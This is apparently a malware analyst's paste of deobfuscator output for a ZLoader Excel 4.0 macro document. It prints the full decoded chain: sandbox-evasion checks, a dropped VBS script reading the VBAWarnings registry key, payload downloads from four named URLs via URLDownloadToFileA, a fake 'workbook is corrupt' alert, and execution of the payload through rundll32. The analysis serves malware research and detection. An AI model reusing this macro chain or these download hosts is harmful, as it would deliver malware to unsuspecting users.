dissectmalware

ZLOADER - new

Jun 21st, 2020
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\746a9efdf92bc2fdbf2f9e4707052c50a7d0d6307afa9339c1a5e10e8d5ebf9d\746a9efdf92bc2fdbf2f9e4707052c50a7d0d6307afa9339c1a5e10e8d5ebf9d.xls
  22.  
  23. Unencrypted xls file
  24.  
  25. [Loading Cells]
  26. auto_open: auto_open->'jdOsRgCP7ufKCKrN6H'!$DA$19234
  27. [Starting Deobfuscation]
  28. CELL:DA19234 , FullEvaluation , FORMULA("=CHAR(R[-3897]C[150])",jdOsRgCP7ufKCKrN6H$CP$21706:$CP$21786)
  29. CELL:DA19235 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  30. CELL:II24421 , FullEvaluation , "=CLOSE(FALSE)"
  31. CELL:II24422 , FullEvaluation , "=APP.MAXIMIZE()"
  32. CELL:II24423 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R49803C239),)"
  33. CELL:II24424 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R49803C239))"
  34. CELL:II24425 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)"
  35. CELL:II24426 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R49803C239),)"
  36. CELL:II24427 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)"
  37. CELL:II24428 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)"
  38. CELL:II24429 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R49803C239))"
  39. CELL:II24430 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R49803C239))"
  40. CELL:II24431 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R49803C239))"
  41. CELL:II24432 , FullEvaluation , "=""C:\Users\Public\yY7LXk5.vbs"""
  42. CELL:II24433 , FullEvaluation , "=""C:\Users\Public\JFxI6.txt"""
  43. CELL:II24434 , FullEvaluation , "=FOPEN(R49814C239,3)"
  44. CELL:II24435 , FullEvaluation , "=FWRITELN(R49816C239,""On Error Resume Next"")"
  45. CELL:II24436 , FullEvaluation , "=FWRITELN(R49816C239,""Set s61VxxB = CreateObject(""""WScript.Shell"""")"")"
  46. CELL:II24437 , FullEvaluation , "=FWRITELN(R49816C239,""Set senZg = CreateObject(""""Scripting.FileSystemObject"""")"")"
  47. CELL:II24438 , FullEvaluation , "=FWRITELN(R49816C239,""Set rwi9e83n = senZg.CreateTextFile(""""""&R49815C239&"""""", True)"")"
  48. CELL:II24439 , FullEvaluation , "=FWRITELN(R49816C239,""rwi9e83n.WriteLine(s61VxxB.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  49. CELL:II24440 , FullEvaluation , "=FWRITELN(R49816C239,""rwi9e83n.Close"")"
  50. CELL:II24441 , FullEvaluation , "=FCLOSE(R49816C239)"
  51. CELL:II24442 , FullEvaluation , "=EXEC(""explorer.exe ""&R49814C239&"""")"
  52. CELL:II24443 , FullEvaluation , "=WHILE(ISERROR(FILES(R49815C239)))"
  53. CELL:II24444 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  54. CELL:II24445 , FullEvaluation , "=NEXT()"
  55. CELL:II24446 , FullEvaluation , "=FILE.DELETE(R49814C239)"
  56. CELL:II24447 , FullEvaluation , "=FOPEN(R49815C239,2)"
  57. CELL:II24448 , FullEvaluation , "=FREAD(R49829C239,100)"
  58. CELL:II24449 , FullEvaluation , "=FCLOSE(R49829C239)"
  59. CELL:II24450 , FullEvaluation , "=FILE.DELETE(R49815C239)"
  60. CELL:II24451 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R49830C239)),GOTO(R49803C239),)"
  61. CELL:II24452 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))"
  62. CELL:II24453 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  63. CELL:AM56374 , FullEvaluation , FORMULA("=FORMULA(R[-31954]C[204],R[-6572]C[200])",jdOsRgCP7ufKCKrN6H$AM$56375:$AM$56406)
  64. CELL:AM56375 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-6572]C[200])
  65. CELL:AM56376 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-6572]C[200])
  66. CELL:AM56377 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R49803C239),)",R[-6572]C[200])
  67. CELL:AM56378 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R49803C239))",R[-6572]C[200])
  68. CELL:AM56379 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)",R[-6572]C[200])
  69. CELL:AM56380 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R49803C239),)",R[-6572]C[200])
  70. CELL:AM56381 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)",R[-6572]C[200])
  71. CELL:AM56382 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)",R[-6572]C[200])
  72. CELL:AM56383 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R49803C239))",R[-6572]C[200])
  73. CELL:AM56384 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R49803C239))",R[-6572]C[200])
  74. CELL:AM56385 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R49803C239))",R[-6572]C[200])
  75. CELL:AM56386 , FullEvaluation , FORMULA("=""C:\Users\Public\yY7LXk5.vbs""",R[-6572]C[200])
  76. CELL:AM56387 , FullEvaluation , FORMULA("=""C:\Users\Public\JFxI6.txt""",R[-6572]C[200])
  77. CELL:AM56388 , FullEvaluation , FORMULA("=FOPEN(R49814C239,3)",R[-6572]C[200])
  78. CELL:AM56389 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""On Error Resume Next"")",R[-6572]C[200])
  79. CELL:AM56390 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set s61VxxB = CreateObject(""""WScript.Shell"""")"")",R[-6572]C[200])
  80. CELL:AM56391 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set senZg = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-6572]C[200])
  81. CELL:AM56392 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set rwi9e83n = senZg.CreateTextFile(""""""&R49815C239&"""""", True)"")",R[-6572]C[200])
  82. CELL:AM56393 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""rwi9e83n.WriteLine(s61VxxB.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-6572]C[200])
  83. CELL:AM56394 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""rwi9e83n.Close"")",R[-6572]C[200])
  84. CELL:AM56395 , FullEvaluation , FORMULA("=FCLOSE(R49816C239)",R[-6572]C[200])
  85. CELL:AM56396 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R49814C239&"""")",R[-6572]C[200])
  86. CELL:AM56397 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R49815C239)))",R[-6572]C[200])
  87. CELL:AM56398 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-6572]C[200])
  88. CELL:AM56399 , FullEvaluation , FORMULA("=NEXT()",R[-6572]C[200])
  89. CELL:AM56400 , FullEvaluation , FORMULA("=FILE.DELETE(R49814C239)",R[-6572]C[200])
  90. CELL:AM56401 , FullEvaluation , FORMULA("=FOPEN(R49815C239,2)",R[-6572]C[200])
  91. CELL:AM56402 , FullEvaluation , FORMULA("=FREAD(R49829C239,100)",R[-6572]C[200])
  92. CELL:AM56403 , FullEvaluation , FORMULA("=FCLOSE(R49829C239)",R[-6572]C[200])
  93. CELL:AM56404 , FullEvaluation , FORMULA("=FILE.DELETE(R49815C239)",R[-6572]C[200])
  94. CELL:AM56405 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R49830C239)),GOTO(R49803C239),)",R[-6572]C[200])
  95. CELL:AM56406 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))",R[-6572]C[200])
  96. CELL:AM56407 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  97. CELL:IE49804 , PartialEvaluation , APP.MAXIMIZE()
  98. CELL:IE49805 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R49803C239),)
  99. CELL:IE49806 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R49803C239))
  100. CELL:IE49807 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R49803C239),)
  101. CELL:IE49808 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R49803C239),)
  102. CELL:IE49809 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)
  103. CELL:IE49810 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)
  104. CELL:IE49811 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R49803C239))
  105. CELL:IE49812 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R49803C239))
  106. CELL:IE49813 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R49803C239))
  107. CELL:IE49813 , FullEvaluation , [TRUE]
  108. CELL:IE49814 , FullEvaluation , "C:\Users\Public\yY7LXk5.vbs"
  109. CELL:IE49815 , FullEvaluation , "C:\Users\Public\JFxI6.txt"
  110. CELL:IE49816 , PartialEvaluation , FOPEN("C:\Users\Public\yY7LXk5.vbs",3)
  111. CELL:IE49817 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","On Error Resume Next")
  112. CELL:IE49818 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set s61VxxB = CreateObject(""WScript.Shell"")")
  113. CELL:IE49819 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set senZg = CreateObject(""Scripting.FileSystemObject"")")
  114. CELL:IE49820 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set rwi9e83n = senZg.CreateTextFile(""C:\Users\Public\JFxI6.txt"", True)")
  115. CELL:IE49821 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","rwi9e83n.WriteLine(s61VxxB.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  116. CELL:IE49822 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","rwi9e83n.Close")
  117. CELL:IE49823 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)")
  118. CELL:IE49824 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\yY7LXk5.vbs")
  119. CELL:IE49825 , PartialEvaluation , WHILE(ISERROR(FILES(R49815C239)))
  120. CELL:IE49828 , PartialEvaluation , FILE.DELETE("C:\Users\Public\yY7LXk5.vbs")
  121. CELL:IE49829 , PartialEvaluation , FOPEN("C:\Users\Public\JFxI6.txt",2)
  122. CELL:IE49830 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\JFxI6.txt"",2)",100)
  123. CELL:IE49831 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\JFxI6.txt"",2)")
  124. CELL:IE49832 , PartialEvaluation , FILE.DELETE("C:\Users\Public\JFxI6.txt")
  125. CELL:IE49833 , FullBranching , IF(ISNUMBER(SEARCH("1",R49830C239)),GOTO(R49803C239),)
  126. CELL:IE49833 , FullEvaluation , [TRUE] GOTO(R49803C239)
  127. CELL:IE49803 , End , CLOSE(FALSE)
  128. CELL:IE49833 , FullEvaluation , [FALSE]
  129. CELL:IE49834 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))
  130. CELL:IE49834 , FullEvaluation , [TRUE] GOTO(R20478C66)
  131. CELL:BN20478 , FullEvaluation , "=""C:\Users\Public\rVuj5bF.html"""
  132. CELL:BN20479 , FullEvaluation , "=""https://wireborg.com/wp-keys.php"""
  133. CELL:BN20480 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38078C223,R38077C223,0,0)"
  134. CELL:BN20481 , FullEvaluation , "=FILES(R38077C223)"
  135. CELL:BN20482 , FullEvaluation , "=IF(ISERROR(R38080C223),GOTO(R38087C223),)"
  136. CELL:BN20483 , FullEvaluation , "=FOPEN(R38077C223)"
  137. CELL:BN20484 , FullEvaluation , "=FSIZE(R38082C223)"
  138. CELL:BN20485 , FullEvaluation , "=FCLOSE(R38082C223)"
  139. CELL:BN20486 , FullEvaluation , "=IF(R38083C223<40000,,GOTO(R38104C223))"
  140. CELL:BN20487 , FullEvaluation , "=""http://zmedia.shwetech.com/wp-keys.php"""
  141. CELL:BN20488 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38086C223,R38077C223,0,0)"
  142. CELL:BN20489 , FullEvaluation , "=FILES(R38077C223)"
  143. CELL:BN20490 , FullEvaluation , "=IF(ISERROR(R38088C223),GOTO(R38095C223),)"
  144. CELL:BN20491 , FullEvaluation , "=FOPEN(R38077C223)"
  145. CELL:BN20492 , FullEvaluation , "=FSIZE(R38090C223)"
  146. CELL:BN20493 , FullEvaluation , "=FCLOSE(R38090C223)"
  147. CELL:BN20494 , FullEvaluation , "=IF(R38091C223<40000,,GOTO(R38104C223))"
  148. CELL:BN20495 , FullEvaluation , "=""https://datalibacbi.ml/wp-keys.php"""
  149. CELL:BN20496 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38094C223,R38077C223,0,0)"
  150. CELL:BN20497 , FullEvaluation , "=FILES(R38077C223)"
  151. CELL:BN20498 , FullEvaluation , "=IF(ISERROR(R38096C223),GOTO(R38103C223),)"
  152. CELL:BN20499 , FullEvaluation , "=FOPEN(R38077C223)"
  153. CELL:BN20500 , FullEvaluation , "=FSIZE(R38098C223)"
  154. CELL:BN20501 , FullEvaluation , "=FCLOSE(R38098C223)"
  155. CELL:BN20502 , FullEvaluation , "=IF(R38099C223<40000,,GOTO(R38104C223))"
  156. CELL:BN20503 , FullEvaluation , "=""https://procacardenla.ga/wp-keys.php"""
  157. CELL:BN20504 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38102C223,R38077C223,0,0)"
  158. CELL:BN20505 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  159. CELL:BN20506 , FullEvaluation , "=ALERT(R38104C223)"
  160. CELL:BN20507 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  161. CELL:BN20508 , FullEvaluation , "=R38077C223&"",DllRegisterServer"""
  162. CELL:BN20509 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38106C223,R38107C223,0,5)"
  163. CELL:BN20510 , FullEvaluation , "=GOTO(R49803C239)"
  164. CELL:BN20511 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  165. CELL:FR55133 , FullEvaluation , FORMULA("=FORMULA(R[-34656]C[-108],R[-17057]C[49])",jdOsRgCP7ufKCKrN6H$FR$55134:$FR$55166)
  166. CELL:FR55134 , FullEvaluation , FORMULA("=""C:\Users\Public\rVuj5bF.html""",R[-17057]C[49])
  167. CELL:FR55135 , FullEvaluation , FORMULA("=""https://wireborg.com/wp-keys.php""",R[-17057]C[49])
  168. CELL:FR55136 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38078C223,R38077C223,0,0)",R[-17057]C[49])
  169. CELL:FR55137 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
  170. CELL:FR55138 , FullEvaluation , FORMULA("=IF(ISERROR(R38080C223),GOTO(R38087C223),)",R[-17057]C[49])
  171. CELL:FR55139 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
  172. CELL:FR55140 , FullEvaluation , FORMULA("=FSIZE(R38082C223)",R[-17057]C[49])
  173. CELL:FR55141 , FullEvaluation , FORMULA("=FCLOSE(R38082C223)",R[-17057]C[49])
  174. CELL:FR55142 , FullEvaluation , FORMULA("=IF(R38083C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
  175. CELL:FR55143 , FullEvaluation , FORMULA("=""http://zmedia.shwetech.com/wp-keys.php""",R[-17057]C[49])
  176. CELL:FR55144 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38086C223,R38077C223,0,0)",R[-17057]C[49])
  177. CELL:FR55145 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
  178. CELL:FR55146 , FullEvaluation , FORMULA("=IF(ISERROR(R38088C223),GOTO(R38095C223),)",R[-17057]C[49])
  179. CELL:FR55147 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
  180. CELL:FR55148 , FullEvaluation , FORMULA("=FSIZE(R38090C223)",R[-17057]C[49])
  181. CELL:FR55149 , FullEvaluation , FORMULA("=FCLOSE(R38090C223)",R[-17057]C[49])
  182. CELL:FR55150 , FullEvaluation , FORMULA("=IF(R38091C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
  183. CELL:FR55151 , FullEvaluation , FORMULA("=""https://datalibacbi.ml/wp-keys.php""",R[-17057]C[49])
  184. CELL:FR55152 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38094C223,R38077C223,0,0)",R[-17057]C[49])
  185. CELL:FR55153 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
  186. CELL:FR55154 , FullEvaluation , FORMULA("=IF(ISERROR(R38096C223),GOTO(R38103C223),)",R[-17057]C[49])
  187. CELL:FR55155 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
  188. CELL:FR55156 , FullEvaluation , FORMULA("=FSIZE(R38098C223)",R[-17057]C[49])
  189. CELL:FR55157 , FullEvaluation , FORMULA("=FCLOSE(R38098C223)",R[-17057]C[49])
  190. CELL:FR55158 , FullEvaluation , FORMULA("=IF(R38099C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
  191. CELL:FR55159 , FullEvaluation , FORMULA("=""https://procacardenla.ga/wp-keys.php""",R[-17057]C[49])
  192. CELL:FR55160 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38102C223,R38077C223,0,0)",R[-17057]C[49])
  193. CELL:FR55161 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[-17057]C[49])
  194. CELL:FR55162 , FullEvaluation , FORMULA("=ALERT(R38104C223)",R[-17057]C[49])
  195. CELL:FR55163 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[-17057]C[49])
  196. CELL:FR55164 , FullEvaluation , FORMULA("=R38077C223&"",DllRegisterServer""",R[-17057]C[49])
  197. CELL:FR55165 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38106C223,R38107C223,0,5)",R[-17057]C[49])
  198. CELL:FR55166 , FullEvaluation , FORMULA("=GOTO(R49803C239)",R[-17057]C[49])
  199. CELL:FR55167 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  200. CELL:HO38077 , FullEvaluation , "C:\Users\Public\rVuj5bF.html"
  201. CELL:HO38078 , FullEvaluation , "https://wireborg.com/wp-keys.php"
  202. CELL:HO38079 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://wireborg.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  203. CELL:HO38080 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  204. CELL:HO38081 , FullBranching , IF(ISERROR(R38080C223),GOTO(R38087C223),)
  205. CELL:HO38081 , FullEvaluation , [TRUE] GOTO(R38087C223)
  206. CELL:HO38087 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  207. CELL:HO38088 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  208. CELL:HO38089 , FullBranching , IF(ISERROR(R38088C223),GOTO(R38095C223),)
  209. CELL:HO38089 , FullEvaluation , [TRUE] GOTO(R38095C223)
  210. CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  211. CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  212. CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
  213. CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
  214. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  215. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  216. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  217. CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  218. CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
  219. CELL:HO38108 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\rVuj5bF.html,DllRegisterServer",0,5)
  220. CELL:HO38109 , FullEvaluation , GOTO(R49803C239)
  221. CELL:IE49803 , End , CLOSE(FALSE)
  222. CELL:HO38097 , FullEvaluation , [FALSE]
  223. CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  224. CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  225. CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  226. CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
  227. CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  228. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  229. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  230. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  231. CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  232. CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
  233. CELL:HO38108 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\rVuj5bF.html,DllRegisterServer",0,5)
  234. CELL:HO38109 , FullEvaluation , GOTO(R49803C239)
  235. CELL:IE49803 , End , CLOSE(FALSE)
  236. CELL:HO38089 , FullEvaluation , [FALSE]
  237. CELL:HO38090 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  238. CELL:HO38091 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  239. CELL:HO38092 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  240. CELL:HO38093 , FullEvaluation , IF(R38091C223<40000,,GOTO(R38104C223))
  241. CELL:HO38094 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
  242. CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  243. CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  244. CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
  245. CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
  246. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  247. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  248. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  249. CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  250. CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
  251. CELL:HO38097 , FullEvaluation , [FALSE]
  252. CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  253. CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  254. CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  255. CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
  256. CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  257. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  258. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  259. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  260. CELL:HO38081 , FullEvaluation , [FALSE]
  261. CELL:HO38082 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  262. CELL:HO38083 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  263. CELL:HO38084 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  264. CELL:HO38085 , FullEvaluation , IF(R38083C223<40000,,GOTO(R38104C223))
  265. CELL:HO38086 , FullEvaluation , "http://zmedia.shwetech.com/wp-keys.php"
  266. CELL:HO38087 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  267. CELL:HO38088 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  268. CELL:HO38089 , FullBranching , IF(ISERROR(R38088C223),GOTO(R38095C223),)
  269. CELL:HO38089 , FullEvaluation , [TRUE] GOTO(R38095C223)
  270. CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  271. CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  272. CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
  273. CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
  274. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  275. CELL:HO38097 , FullEvaluation , [FALSE]
  276. CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
